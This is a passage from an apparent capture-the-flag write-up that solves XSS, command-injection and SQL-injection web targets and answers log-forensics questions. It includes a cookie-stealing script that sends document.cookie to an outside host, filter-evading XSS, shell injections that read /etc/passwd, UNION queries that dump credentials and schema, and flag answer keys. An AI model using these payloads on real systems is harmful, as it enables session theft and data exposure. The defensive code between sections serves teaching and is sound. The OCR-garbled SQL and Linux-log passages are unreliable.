https://target-four/?perma=Jmx0O3NjcmlwdCZndDtkb2N1bWVudC5sb2NhdGlvbj0mcXVvdDtodHRwOi8vZmFjZS1zZXJ2ZXIvaW5kZXgucGhwP2Nvb2tpZT0mcXVvdDsrZG9jdW1lbnQuY29va2llOyZsdDsvc2NyaXB0Jmd0Owo=

Which returns the fourth flag for target four.

4th Flag Is: NCL-EHDF-9623
5. Flag Five

The fifth and final flag for target four requires the user to manipulate the page heading.

Reading the page source, the player should notice that one particular element is actually labeled as the "heading":

<h1 id="heading">Ted's Research Portal :: Search</h1>

Utilizing the JavaScript document.getElementById function, the player can directly interact with this element and complete the task of changing the value to "flag5".

The object returned by document.getElementById exposes a property, innerHTML, which can be assigned to change the contents of the specified HTML tag.

https://target-four/?search=<script>document.getElementById('heading').innerHTML='flag5';</script>&submit=Search

The above URL will result in the appropriate heading change, as required to retrieve the fifth flag. As always, the answer will only be obtained once the Permalink is generated.

However, this time a new response is returned instead of the flag value:

FLAG5 XSS DETECTED $ DENIED

Clearly the web application is doing some limited filtering. This is akin to an ecommerce application checking for manipulation of an item price instead of fixing the cross-site scripting vulnerability itself.

At this point the player will need to experiment with cross-site scripting detection evasion, specifically encoding.

It turns out that this web application is simply looking for the literal value "flag5" being set as the innerHTML for the page heading. Leaving all of the injected script intact and simply encoding the string "flag5" (in either HTML or UTF-8 encoding schemes) will return the flag.

<script>document.getElementById('heading').innerHTML='&#x66;&#x6C;&#x61;&#x67;&#x35;';</script>

https://target-four/?search=<script>document.getElementById('heading').innerHTML%3D'%26%23x66%3B%26%23x6C%3B%26%23x61%3B%26%23x67%3B%26%23x35%3B'%3B<%2Fscript>&submit=Search

<script>document.getElementById('heading').innerHTML='&#102&#108&#97&#103&#53';</script>

https://target-four/?search=<script>document.getElementById('heading').innerHTML%3D'%26%23102%26%23108%26%2397%26%23103%26%2353'%3B<%2Fscript>&submit=Search

The flag would be returned with either of the above Permalinks.

5th Flag Is: NCL-EFSF-7823
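The permalink mechanics (HTML entities first, then BASE64) and the flag-five filter that matched the literal string before decoding it are both easy to reproduce. The following is an added example, not code from the write-up or from the challenge application: it re-creates the perma encoding so the strings above can be checked, and shows the normalization a server-side filter needs (percent-decode, then resolve character references) before looking for a marker such as "flag5" or a script tag. The entity rules (&, <, > and " escaped, single quote left alone) are inferred from the decoded permalink shown above; the function names are this example's own.

```python
import base64
import html
import re
import urllib.parse


def entity_encode(text: str) -> str:
    """Escape &, <, > and the double quote; the single quote is left alone.

    These rules are inferred from the decoded permalink in the write-up
    (the ' inside document.write('...') survives while " becomes &quot;)."""
    return html.escape(text, quote=False).replace('"', "&quot;")


def encode_permalink(payload: str) -> str:
    """Entity-encode the search term, then BASE64 it: the 'perma' parameter."""
    return base64.b64encode(entity_encode(payload).encode("utf-8")).decode("ascii")


def decode_permalink(perma: str) -> str:
    """Reverse a 'perma' value back to the search term the user typed."""
    return html.unescape(base64.b64decode(perma).decode("utf-8"))


def normalize_search_input(raw: str) -> str:
    """Strip the encoding layers before inspecting a search term.

    A filter that matches the raw parameter misses "flag5" when it arrives as
    &#x66;&#x6C;... or &#102&#108... (with or without semicolons), possibly
    wrapped in percent-encoding. Percent-decode, then resolve character
    references; both steps are what the server and browser will do anyway."""
    return html.unescape(urllib.parse.unquote(raw))


SCRIPT_MARKERS = re.compile(
    r"<\s*script\b|\binnerHTML\s*=|document\.(?:cookie|location|write)\b",
    re.IGNORECASE,
)


def looks_like_script_injection(raw: str) -> bool:
    """Detection check run on the normalized term, never on the raw one."""
    return SCRIPT_MARKERS.search(normalize_search_input(raw)) is not None


def contains_literal(raw: str, needle: str) -> bool:
    """The challenge filter compared the raw string; compare the normalized one."""
    return needle in normalize_search_input(raw)
```

Checking the raw parameter, as the challenge application did, is what let the entity-encoded "flag5" through; every decoding step the page or browser will perform has to be applied before the comparison, and the comparison is only a stopgap until the reflected output is properly encoded.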
G. Target Five - Command Injection

For this puzzle the player is again presented with a web application, this time a Network Testing interface. The network testing application provides numerous tools, such as: ping, trace route, DNS lookup, whois, and configuration file searching.


Each of the tools works, performing its respective action. The player should review the page's source code to find five (5) HTML comments providing directions on what is required for each of the five (5) flags.

<!-- There are five flags on this XSS vulnerable page --!>
<!-- Flag 1: Using PING Form, cat /etc/passwd --!>
<!-- Flag 2: Using TraceRouter Form, cat /etc/group --!>
<!-- Flag 3: Using DNS Lookup Form, cat /etc/motd --!>
<!-- Flag 4: Using Whois Form, cat /etc/shells --!>
<!-- Flag 5: Using Find Config Files Form, cat /etc/profile --!>

In Linux there are a few ways to end the execution of one command and begin another. The pipe is one of the most commonly used methods to execute numerous commands on a single line; however, it specifically takes the output (stdout) from the first command and feeds it (stdin) into the second command. Depending on our goal this may not work as we desire. The two other methods execute the commands independently of each other: the double ampersand and the semi-colon. Using a double ampersand, the second command will only execute if the first one exits properly (no errors), and the semi-colon will run the second command regardless.

Most of the challenge will actually accept any of the above three methods, but this write-up will usually use the semi-colon unless otherwise specified.
1. Flag One

The first task is to use the ping tool to obtain the /etc/passwd file. The /etc/passwd file contains authentication information for Linux systems. The directions specifically indicate that the file should be "cat'd": cat, or concatenate, is a Linux tool that can be used to join multiple files together, but in the great usefulness that is Linux utilities it doubles as a tool commonly used to dump file contents to the screen, a piped command, or a file.

While using the various tools provided on the page, the player should come to the conclusion, based on the output, that the values they enter are being passed into the relevant Linux commands for the given task.



Just like the cross-site scripting vulnerabilities, if the input accepted from the user is not first sanitized, the user could inject his or her own commands.

Entering the following command injection test into the PING form indicates that input is not being sanitized and command injection is indeed possible:

; id

Which returns the following output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Now the participant simply needs to inject the command they were provided in the source code:

; cat /etc/passwd

Which indeed returns the first flag.

1st Flag Is: NCL-TYIA-1682
2. Flag Two

The second flag requires the contestant to cat the /etc/group file from the Trace Route tool. The /etc/group file is yet another file that contains authentication related information for Linux.

; cat /etc/group

The previous command does not provide the flag nor the expected output, but instead an error:

Error: Must enter a valid IP Address

It should now be apparent to the player that this form is doing some limited input validation.

Providing just any input before the semi-colon doesn't work; the value must be a valid IP address:

8.8.8.8; cat /etc/group

Which provides the second flag:

2nd Flag Is: NCL-MVBC-1354
3. Flag Three

The third flag requires the player to output the message of the day file (/etc/motd) through the DNS Lookup tool.

Knowing the previous tool input had some limited validation, and that this tool is anticipating a domain name, the player would try something along the lines of the following:

google.com; cat /etc/motd

However, this will not work, and will provide a new error:

Error: Must End In Valid TLD (.com, .net, .org, .gov)

The error is clear in the fact that the input must end with a TLD (and specifically one mentioned in the error message). Luckily the cat utility gracefully ignores nonexistent files. So simply adding a ".com", or one of the other allowed TLDs, to the end of the command (separated by a space from the path to the message of the day) would work:

google.com; cat /etc/motd .com

3rd Flag Is: NCL-AEFW-1680



4. Flag Four

The fourth flag requires the /etc/shells file to be obtained via the Whois tool form. A quick first attempt would likely result in an error:

; cat /etc/shells

Command Injection Found - Denied

Indeed this tool form is doing input validation and is specifically blocking our command injection. Trial and error on the player's part will likely yield the fact that it is the semi-colon that is alerting the web application to the command injection attempt. The double ampersand will also cause the web application to block the attempt. Only the pipe method will work:

| cat /etc/shells

The above will get the participant around the command injection check, but it still results in an error:

Error: Must End In Valid TLD (.com, .net, .org, .gov) Or be a valid IP

Combining the previously learned technique, the player can now easily obtain this fourth flag:

| cat /etc/shells 8.8.8.8

4th Flag Is: NCL-PUIQ-2347
5. Flag Five

The fifth and final flag for this challenge is a configuration search form. Unlike the other tools, this one simply lists files that match the text entered by the user.

Testing different search patterns will reveal that the form is performing a find within the /etc directory. This flag will require some understanding of how the find command works, specifically because the input from the user is being placed into the middle of the find command, so simply ending the previous command and starting a new one will not be possible.

Luckily find has a built-in execute option (-exec), which allows each file found to be passed to a new command for execution. In this case the player needs to return the /etc/profile file.

The following injection will find a file (/etc/motd) and pass it to be executed by the provided command (cat /etc/profile), resulting in the required file being cat'd and the flag being returned:

motd" -exec cat /etc/profile {} \;"

5th Flag Is: NCL-KDGD-0373
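The validation failures seen across the five forms (a blocklist that catches ; and && but not |, and an IP check that only requires a valid address to appear somewhere in the input) are contrasted below with whole-input validation and argv-based execution. This is an added Python example, not code from the challenge application; the function names are this example's own, and the "weak" checks are reconstructions of the behaviour the write-up observed, not the application's actual source.

```python
import ipaddress
import re
import subprocess

IPV4_ANYWHERE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def weak_ip_check(value: str) -> bool:
    """Reconstruction of the observed behaviour: pass if an IP appears *somewhere*.

    '8.8.8.8; cat /etc/group' satisfies it, which is how flags two and four fell."""
    return IPV4_ANYWHERE.search(value) is not None


def weak_separator_check(value: str) -> bool:
    """Reconstruction of the whois form's blocklist: only ';' and '&&' are refused."""
    return ";" not in value and "&&" not in value


def strict_ip_check(value: str) -> bool:
    """Whole-input validation: the entire field must parse as one IP address."""
    try:
        ipaddress.ip_address(value.strip())
    except ValueError:
        return False
    return True


def ping_argv(target: str) -> list:
    """Build the command as an argv list; no shell ever sees the user's text."""
    if not strict_ip_check(target):
        raise ValueError("target must be a single IP address")
    return ["ping", "-c", "1", target.strip()]


def run_ping(target: str) -> str:
    """shell=False with an argv list: ';', '&&' and '|' are just characters."""
    proc = subprocess.run(ping_argv(target), capture_output=True, text=True,
                          timeout=15, check=False)
    return proc.stdout
```

For the DNS and whois forms the same approach applies with a hostname validator (a syntax check on the labels and an allowlist of TLDs tested against the whole string, not a suffix search), and for the file search the user text should reach find only as a single -name argument inside the argv list, never spliced into a shell string.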
H. Target Six - SQL Injection

The sixth target provides the player with nothing more than a login, asking for a Username and Password.



Upon testing, the player should quickly learn that the Login is vulnerable to SQL Injection, a common authentication problem for database-backed web applications.

A simple SQL injection (entered in both the Username and Password field) will result in the player being logged in as the admin:

' or ''='

Congrats admin. You are authenticated.

There are, however, two (2) flags for this challenge. The player needs to obtain the password for the 'jsmith' account and the item name for the item with an ID of 6.

Fortunately the web application will provide the SQL that was executed if you are successfully authenticated (or, specifically, if the query succeeds):

Select * from tblUsers where UserName='' or ''='' and password='' or ''=''

Now that the player has confirmed their ability to inject content into the SQL query, their next task is to obtain the password for jsmith. The above query reveals a few relevant pieces of information: the user table name (tblUsers) and two fields from the user table (UserName and Password).

The participant should note that the interface welcomes the user by some type of name (possibly the UserName) upon successful login. It is possible with this output to manipulate the query to return the needed information.

All futuie login attempts with this web application shoulu manipulate
only the passwoiu fielu, leaving the useiname blank (oi with a tiue
iesulting conuition like pieviously useu).

A [IU(I is a special SQL queiy connectoi that matches the output of
one queiy with that of anothei, combining them into one laige output.
The injection neeus to be a 0NI0N that ietuins the passwoiu fielu
fiom the usei table, but also limits the iesults to a single iow,
specifically the iow with the ielevant passwoiu in it. Eithei limiting
the fiist queiy can uo this oi using conuitions to iemove ietuineu
iows one-by-one. Foi obvious ieasons limiting the fiist queiy is a
much quickei methou in this case but the conuition methou is useful
when attempting to enumeiate the entiie table's contents.

The following injection should return the password for 'jsmith':

' OR ''='' LIMIT 0 UNION SELECT Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName

The above injection will, however, fail. The reason the query fails is simple: the number of columns for a UNION must match (same number in first and second query). The player should now experiment with different numbers of columns in the second query until it succeeds. The contestant will soon come to learn that the user table has four columns and thus the second query being injected must also return four columns.

' OR ''='' LIMIT 0 UNION SELECT Password, Password, Password, Password, Password FROM tblUsers WHERE UserName = 'jsmith' ORDER BY 'UserName

Which provides us the flag in the welcome message output:

Congrats NCL-DGSO-4432. You are authenticated.

Based on flag formatting, and the obvious intention of our injection, the flag is clearly identifiable in the welcome message. Now the participant will move on to the item with an ID of 6. Common sense would indicate that the items are not stored in the user table; of course this is verifiable by enumerating the entire table with the technique detailed previously.

Thus far there has been no indication of the name of the second table, so that must be queried before we can obtain the proper item information.
MySQL happens to have a useful schema, INFORMATION_SCHEMA, which contains relevant information like the names of tables and columns. This schema can be queried, like any other table, to return the information the player is after. The following injection will return the first table in the database:

' OR ''='' LIMIT 0 UNION SELECT table_name, table_name, table_name, table_name, table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema != 'performance_schema' ORDER BY 'UserName

The query that is built as a result of this injection will first query and then return zero results from the user table, and then union with the second query, which is requesting a table name from the information schema, removing known defaults from the output:

Congrats tblInventory. You are authenticated.

It just so happens that the first table is named "tblInventory". Further queries would confirm that this is the only other table in the database. Next the player will need to learn the columns within the inventory table. Again the INFORMATION_SCHEMA can be queried for this information:

' OR ''='' LIMIT 0 UNION SELECT column_name, column_name, column_name, column_name, column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'tblInventory' ORDER BY 'UserName

Congrats item. You are authenticated.

The above injection provides us with one relevant column, item. This is likely the column the player needs to return for the flag value. But first the contestant must learn the name of the item identification number column. Utilizing the previous query with an added condition to ignore the "item" column should provide the next column in the inventory table:

Congrats itemNum. You are authenticated.

Now the player has the required information to craft the final query for the last flag of target six, and round one:

' OR ''='' LIMIT 0 UNION SELECT item, item, item, item, item FROM tblInventory WHERE itemNum = 6 ORDER BY 'UserName

Congrats NCL-GSHI-9834. You are authenticated.
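The two mechanics this target turns on, a string-built authentication query and the UNION column-count rule, can be reproduced against an in-memory SQLite database. This is an added example, not the challenge's code or schema: tblUsers and tblInventory here are constructed with made-up columns and rows, and the vulnerable and parameterised login functions are this example's own. SQLite is used because it needs no server; its column-count error text differs from MySQL's, but the rule is the same.

```python
import sqlite3

# Constructed stand-in for the challenge database; every column name beyond
# UserName/Password/item/itemNum and every row value is invented for this example.
SCHEMA = """
CREATE TABLE tblUsers (UserName TEXT, Password TEXT, FullName TEXT, Email TEXT, Role TEXT);
INSERT INTO tblUsers VALUES ('admin',  'constructed-admin-pw',  'Site Admin', 'admin@example.test',  'admin');
INSERT INTO tblUsers VALUES ('jsmith', 'constructed-jsmith-pw', 'J. Smith',   'jsmith@example.test', 'user');
CREATE TABLE tblInventory (itemNum INTEGER, item TEXT);
INSERT INTO tblInventory VALUES (6, 'constructed-item-six');
"""


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query: user input becomes SQL syntax, as on the challenge login."""
    sql = "SELECT * FROM tblUsers WHERE UserName='%s' AND Password='%s'" % (username, password)
    row = conn.execute(sql).fetchone()
    return row[0] if row else None      # the name shown in "Congrats <name>"


def login_safe(conn, username: str, password: str):
    """Parameterised query: values travel separately from the SQL text, so a
    quote in the input is only a character being compared, never syntax."""
    sql = "SELECT * FROM tblUsers WHERE UserName=? AND Password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def union_probe(conn, column_count: int):
    """Reproduces the rule the write-up hit: a UNION whose right-hand SELECT
    returns a different number of columns than the left one (five here) is
    rejected. Returns the first column of the first row, or None when refused."""
    cols = ", ".join(["Password"] * column_count)
    sql = ("SELECT * FROM tblUsers WHERE 0 "
           "UNION SELECT %s FROM tblUsers WHERE UserName='jsmith'" % cols)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError:
        return None
    return row[0] if row else None
```

The parameterised form is the fix; echoing the executed SQL back to the user, as the challenge application did, is what turned a blind injection into a guided one and should never survive into production.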

III. Round Two - Log Analysis

In the second round participants were to recover fifty (50) flags, found within six (6) different files (five log files and one network data capture). The files were as follows: Windows Security Log, Corrupted Windows Security Log, Linux Authentication Log, Corrupted Linux Authentication Log, Apache Logs, Network Data Capture.

A. Scenario

Great Job Recruit! You demonstrated some good skills during that first FCA Capture-the-Flag Exercise!

Now, the time has come for some real cyber-sleuthing. It seems we have our first big case for you.

One of our client agencies was compromised. Luckily for us, they were able to get some logs, but sadly the attacker covered some of their tracks as well. The good news is the client was able to recover some of the deleted logs. The bad news is that the data is clearly corrupted, and they weren't able to figure out how to get them open again.

Here is what we know. An unidentified attacker accessed a Windows server; the next day a Linux server was compromised; and finally their web site was defaced. We've been given six files: a Windows Security Log, a Corrupted Windows Security Log, a Linux Authentication Log, a Corrupted Linux Authentication Log, the Apache Log Files, and a Network Data Capture from the compromised Web server.

Using these files, please try to uncover as much information as you can about the attacks. We have a questionnaire to help guide you through and help us find the relevant information.

Good luck recruit!
B. Flags
Name | Server | Value
Which user changed the system name? | 127.0.3.1 (Windows Security Log) | 100
Which user had a failed brute force attack run against it? | 127.0.3.1 (Windows Security Log) | 200
Which user account was successfully brute forced? | 127.0.3.1 (Windows Security Log) | 200
Which IP address launched the brute force? | 127.0.3.1 (Windows Security Log) | 200
After obtaining valid credentials, the attacker logs into the system via what protocol? | 127.0.3.1 (Windows Security Log) | 300
The attacker adds which user account to the system? | 127.0.3.1 (Windows Security Log) | 300
Which group, other than Administrators, was the attacker's account added to? | 127.0.3.1 (Windows Security Log) | 300
Which new group did the attacker create? | 127.0.3.1 (Windows Security Log) | 300
At what time did the attacker finally logout of the system? | 127.0.3.1 (Windows Security Log) | 400
Which user attempted to add themselves to the Administrator group? | 127.0.3.1 (Windows Security Log) | 500
Which account did the attacker login with? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What time did the attacker login? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What protocol did the attacker use to login? | 127.0.3.2 (Corrupt Windows Security Log) | 600
What time was the last action logged by our attacker? | 127.0.3.2 (Corrupt Windows Security Log) | 700
The attacker transferred a file to the system via which protocol? | 127.0.3.2 (Corrupt Windows Security Log) | 700
During login the attacker's file is automatically run; what is the name of the file? | 127.0.3.2 (Corrupt Windows Security Log) | 700
After the attacker connects back via their trojan they gain SYSTEM privileges; what is the "New Process ID" for the process in which they obtain SYSTEM privileges? | 127.0.3.2 (Corrupt Windows Security Log) | 800
Which binary was run with "New Process ID" of 2185560096? | 127.0.3.2 (Corrupt Windows Security Log) | 900
A file named svchost.exe was stored within which directory under Joe Johnson's TEMP directory? | 127.0.3.2 (Corrupt Windows Security Log) | 1000
Which other file was created in Joe Johnson's TEMP directory? | 127.0.3.2 (Corrupt Windows Security Log) | 1000
Which user installed and configured SSH access to the system? | 127.0.3.3 (Linux Authentication Log) | 100
Which user had a failed brute force attack against them? | 127.0.3.3 (Linux Authentication Log) | 200
Which user account was successfully brute forced? | 127.0.3.3 (Linux Authentication Log) | 200
Which IP address launched the brute force attacks? | 127.0.3.3 (Linux Authentication Log) | 200
Which IP address did the attacker then use to connect to the system? | 127.0.3.3 (Linux Authentication Log) | 300
Which protocol did the attacker use to login to the system? | 127.0.3.3 (Linux Authentication Log) | 300
What was the first file the attacker read once obtaining access to the system? | 127.0.3.3 (Linux Authentication Log) | 300
Which user account did the attacker add to the system? | 127.0.3.3 (Linux Authentication Log) | 300
At what time did the Authentication Token get altered for the user abrown? | 127.0.3.3 (Linux Authentication Log) | 400
Which IP address did the attacker telnet into from the compromised host? | 127.0.3.3 (Linux Authentication Log) | 500
Which user account does the attacker login with? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
What IP address is the attacker coming from? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
Which protocol did the attacker use to login? | 127.0.3.4 (Corrupt Linux Authentication Log) | 600
Which file did the attacker edit to provide their account root level permissions? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
The attacker transfers a trojan to the system using which protocol? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
The attacker modifies which file to ensure the trojan is executed on system startup? | 127.0.3.4 (Corrupt Linux Authentication Log) | 700
Which permission does the attacker give the trojan to ensure it has elevated privileges regardless of who runs it? | 127.0.3.4 (Corrupt Linux Authentication Log) | 800
What type of attack did the user launch at 09:47:27? | 127.0.3.4 (Corrupt Linux Authentication Log) | 900
The attacker changed the default permission for all future files and directories to what? (use long symbolic format) | 127.0.3.4 (Corrupt Linux Authentication Log) | 1000
The global shell profile was changed; what command was added to this profile? | 127.0.3.4 (Corrupt Linux Authentication Log) | 1000
Which IP address was used to launch a Nikto scan? | 127.0.3.5 (Apache Logs) | 100
Which IP address was used to launch a Nessus scan? | 127.0.3.5 (Apache Logs) | 100
What time did the NMAP scan start? | 127.0.3.5 (Apache Logs) | 200
Which browser was the attacker using when visiting the website? | 127.0.3.5 (Apache Logs) | 300
Which IP address did the attacker use when manually testing the web service? | 127.0.3.5 (Apache Logs) | 500
What HTTP Request Method is used to deface the website? | 127.0.0.6 (Network Data Capture) | 200
What is the sequence number for the packet which defaced the website? | 127.0.0.6 (Network Data Capture) | 300
What is the sequence number for the first packet that contains invalid TCP flag options? | 127.0.0.6 (Network Data Capture) | 1000
Which Snort Community Signature (ID) should fire on the web defacement? | 127.0.0.6 (Network Data Capture) | 1500
What flag was present on the defaced website? | 127.0.0.6 (Network Data Capture) | 5000

C. Windows Security Log

The provided Windows Security Log is in the Event Viewer log format, which should be opened with the Windows Event Viewer. After opening the log file, the flags are self-explanatory; each is simply found within the log. One shortcut that might expedite the search for the flag answers is to save the log in the Comma Separated Value (CSV) format, and then use a text based editor to perform the required searches.

Flag Question | Flag Answer
Which user changed the system name? | jjohnson
Which user had a failed brute force attack run against it? | tanderson
Which user account was successfully brute forced? | jsmith
Which IP address launched the brute force? | 192.168.243.131
After obtaining valid credentials, the attacker logs into the system via what protocol? | telnet
The attacker adds which user account to the system? | nsanders
Which group, other than Administrators, was the attacker's account added to? | Backup Operators
Which new group did the attacker create? | Support
At what time did the attacker finally logout of the system? | 12:47:13PM
Which user attempted to add themselves to the Administrator group? | emiller

D. Corrupt Windows Security Log

For this challenge the player was provided a Corrupted Windows Security Log. This log was also in the Windows Event Viewer format; however, it would fail to open in the Windows Event Viewer.


Lucky for the player, they have the previously provided non-corrupt log to compare against. Opening the corrupted log file in a hex editor should reveal some useful information.



One thing is clear: corrupt or not, the file still contains pertinent log information. File types are very often determined by the very beginning of the file, and this is a common place for problems to begin. Comparing the beginning of the corrupted file to the known valid file will reveal the issue.



The player now needs to simply prepend the file with the proper hexadecimal value:

30000000

At this point the player can load the log in Event Viewer and retrieve the flags.
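The repair above can be scripted and, more usefully, checked before and after. The following added Python example is not from the write-up: it assumes the legacy .evt layout, in which the file begins with a 4-byte little-endian header length of 0x30 followed by the four-byte signature "LfLe" (knowledge of the file format, not something the write-up states), so a log that starts directly with "LfLe" has lost exactly the 30000000 the write-up prepends. The function names and the sample bytes are constructed for this example.

```python
EVT_SIGNATURE = b"LfLe"                             # follows the header-length field in a .evt file
EVT_HEADER_LENGTH = (0x30).to_bytes(4, "little")    # b"\x30\x00\x00\x00": the bytes the write-up prepends


def diagnose_evt(data: bytes) -> str:
    """Classify the start of a file: intact, missing its length field, or unknown."""
    if data[:8] == EVT_HEADER_LENGTH + EVT_SIGNATURE:
        return "ok"
    if data[:4] == EVT_SIGNATURE:
        return "missing-header-length"
    return "unknown"


def repair_evt(data: bytes) -> bytes:
    """Prepend the 0x30 header length when, and only when, that is what is missing."""
    state = diagnose_evt(data)
    if state == "ok":
        return data
    if state == "missing-header-length":
        return EVT_HEADER_LENGTH + data
    raise ValueError("unrecognised .evt header: %s" % data[:8].hex())


def repair_evt_file(src_path: str, dst_path: str) -> str:
    """Read, repair and write a copy; the original evidence file is never modified."""
    with open(src_path, "rb") as fh:
        fixed = repair_evt(fh.read())
    with open(dst_path, "wb") as fh:
        fh.write(fixed)
    return diagnose_evt(fixed)


def constructed_sample() -> bytes:
    """A constructed intact header: length field, signature, then filler bytes."""
    return EVT_HEADER_LENGTH + EVT_SIGNATURE + b"\x00" * 40
```

Refusing to touch anything that does not start with the signature keeps the script from "repairing" a file whose damage is elsewhere, and writing to a new path preserves the original for the evidence trail.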

Flag Question | Flag Answer
Which account did the attacker login with? | nsanders
What time did the attacker login? | 08:43:03AM
What protocol did the attacker use to login? | telnet
What time was the last action logged by our attacker? | 10:06:38AM
The attacker transferred a file to the system via which protocol? | ftp
During login the attacker's file is automatically run; what is the name of the file? | a.exe
After the attacker connects back via their trojan they gain SYSTEM privileges; what is the "New Process ID" for the process in which they obtain SYSTEM privileges? | 2184204320
Which binary was run with "New Process ID" of 2185560096? | cscript.exe
A file named svchost.exe was stored within which directory under Joe Johnson's TEMP directory? | rad418D4.tmp
Which other file was created in Joe Johnson's TEMP directory? | OvZrvD.exe

E. Linux Authentication Log

For this challenge the participant is given a Linux Authentication Log, which contains a large number of log entries, on which the flag questions are based. Just like the non-corrupted Windows log, this section of flags is self-explanatory. The contestant simply needs to read the logs and find the relevant entries corresponding to the flags. It should be noted that the filename ended with a ".1", which should have been an indicator of the log file's format. Linux systems often rotate logs on a time or size basis: once a log reaches the predefined threshold, it is compressed and renamed with a number appended at the end (1 being the most recently rotated log, up through whatever maximum is configured, being the last). So in this case the player would indeed need to uncompress the log file before proceeding.

gzip -d -S ".1" NCL-R2-LAUTH.1

less NCL-R2-LAUTH

Flag Question | Flag Answer
Which user installed and configured SSH access to the system? | abrown
Which user had a failed brute force attack against them? | mdavis
Which user account was successfully brute forced? | tanderson
Which IP address launched the brute force attacks? | 192.168.243.133
Which IP address did the attacker then use to connect to the system? | 192.168.243.191
Which protocol did the attacker use to login to the system? | ssh
What was the first file the attacker read once obtaining access to the system? | /etc/shadow
Which user account did the attacker add to the system? | jbowers
At what time did the Authentication Token get altered for the user abrown? | 13:04:13
Which IP address did the attacker telnet into from the compromised host? | 192.168.243.234

F. Corrupt Linux Authentication Log

The player is provided with a Linux Authentication log that is corrupted. The file is compressed, due to log rotation, and a portion of the compressed file was truncated, resulting in its corruption. Once opened, the participant can easily answer the relevant flag questions, but simply using gzip won't do:

gzip -d -S ".1" blah.1

gzip: blah.1: unexpected end of file

But GZIP is a resilient compression format, and there are a vast number of Linux tools capable of helping us recover the data from within this log file. In fact even gzip itself is capable of reading the non-truncated data, simply by piping it the file contents. Alternatively the contestant can use zcat or some other GZIP compatible tool:

zcat NCL-R2-CLAUTH.log.1

At this point the player can now review the log entries and find the required flag answers.
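Why zcat succeeds where gzip -d gives up is visible in the Python standard library: gzip.decompress insists on seeing the end-of-stream marker, while a raw zlib decompressor hands back everything it could inflate before the input ran out. The following added example (not from the write-up) builds a constructed auth.log-style sample, compresses and truncates it, and recovers the intact prefix; the log lines and helper names are this example's own.

```python
import gzip
import zlib


def constructed_auth_log(lines: int = 300) -> bytes:
    """Constructed sshd-style entries; values vary so the sample does not compress to nothing."""
    out = []
    for i in range(lines):
        out.append(
            "Nov 14 09:%02d:%02d host sshd[%d]: Failed password for invalid user u%03d "
            "from 192.168.243.%d port %d ssh2\n"
            % (i // 60, i % 60, 2000 + i * 7, i, 1 + (i * 37) % 254, 40000 + (i * 131) % 20000)
        )
    return "".join(out).encode("ascii")


def compress_log(raw: bytes) -> bytes:
    return gzip.compress(raw)


def truncate(data: bytes, keep_fraction: float = 0.5) -> bytes:
    """Simulate the corrupted rotated log: drop the tail of the compressed file."""
    return data[: int(len(data) * keep_fraction)]


def strict_decompress_fails(data: bytes) -> bool:
    """What 'gzip -d' does: refuse the whole file when the stream is incomplete."""
    try:
        gzip.decompress(data)
    except (EOFError, OSError, zlib.error):
        return True
    return False


def recover_gzip_prefix(data: bytes) -> bytes:
    """What zcat effectively does: inflate until the input runs out and keep the output.

    wbits=16+MAX_WBITS tells zlib to expect and skip the gzip wrapper."""
    inflater = zlib.decompressobj(16 + zlib.MAX_WBITS)
    recovered = bytearray()
    try:
        recovered += inflater.decompress(data)
        recovered += inflater.flush()
    except zlib.error:
        pass   # a corrupted tail: keep whatever was produced before the error
    return bytes(recovered)


def complete_lines(recovered: bytes) -> list:
    """Drop the cut-off last line; only whole entries should be cited as evidence."""
    parts = recovered.split(b"\n")
    return parts[:-1]      # parts[-1] is either b"" or a partial line
```

The recovered prefix is exact up to the point where the data stops; the one caveat for an investigation is the final line, which may have been cut mid-entry and should not be quoted as if it were complete.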

I|ag uest|ons I|ag Answers
Whlch user accounL does Lhe aLLack logln wlLh? [bowers
WhaL l address ls Lhe aLLacker comlng from? 192.168.243.131
Whlch proLocol dld Lhe aLLacker use Lo logln? ssh
1o whlch flle dld Lhe aLLacker edlL Lo provlde Lhelr
accounL rooL level permlsslons? /eLc/group
1he aLLacker Lransfers a Lro[an Lo Lhe sysLem uslng
whlch proLocol? hLLp
1he aLLacker modlfles whlch flle Lo ensure Lhe Lro[an ls
execuLed on sysLem sLarLup? /eLc/rc.local
Whlch permlsslon does Lhe aLLacker glve Lhe Lro[an Lo
ensure lL has elevaLed prlvledges regarless of who
runs lL? seLuld
WhaL Lype of aLLack dld Lhe user launch aL 09:47:27? fork bomb
1he aLLacker changed Lhe defaulL permlsslon for all
fuLure flles and dlrecLorles Lo whaL? (use long
symblolc formaL) -rw-rw-rw-
1he global shell proflle was changed, whaL command
was added Lo Lhls proflle? exlL

G. Apache Log

This puzzle provides the contestant with an archive containing
Apache Access and Error logs. With these files, the player simply
needs to locate the relevant entries and answer the flag questions.

Flag Questions | Flag Answers

Which IP address was used to launch a Nikto scan? | 192.168.243.13
Which IP address was used to launch a Nessus scan? | 192.168.243.113
What time did the NMAP scan start? | 11:43:03
Which browser was the attacker using when visiting the website? | konqueror
Which IP address did the attacker use when manually testing the web service? | 192.168.243.113

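Locating those entries comes down to parsing the combined log format and looking at two things per source address: the User-Agent strings (the common scanners announce themselves unless told to spoof) and the 404 rate (a probing tool requests many paths that do not exist). This is an added example, not part of the NCL write-up; the access log lines are constructed, with invented addresses:

```python
import re

# Constructed Apache combined-format lines; addresses and times are invented.
ACCESS_LOG = """\
192.0.2.15 - - [14/Jan/2012:11:40:01 -0500] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (compatible; Nikto/2.1.5)"
192.0.2.15 - - [14/Jan/2012:11:40:02 -0500] "GET /cgi-bin/test.cgi HTTP/1.1" 404 312 "-" "Mozilla/5.0 (compatible; Nikto/2.1.5)"
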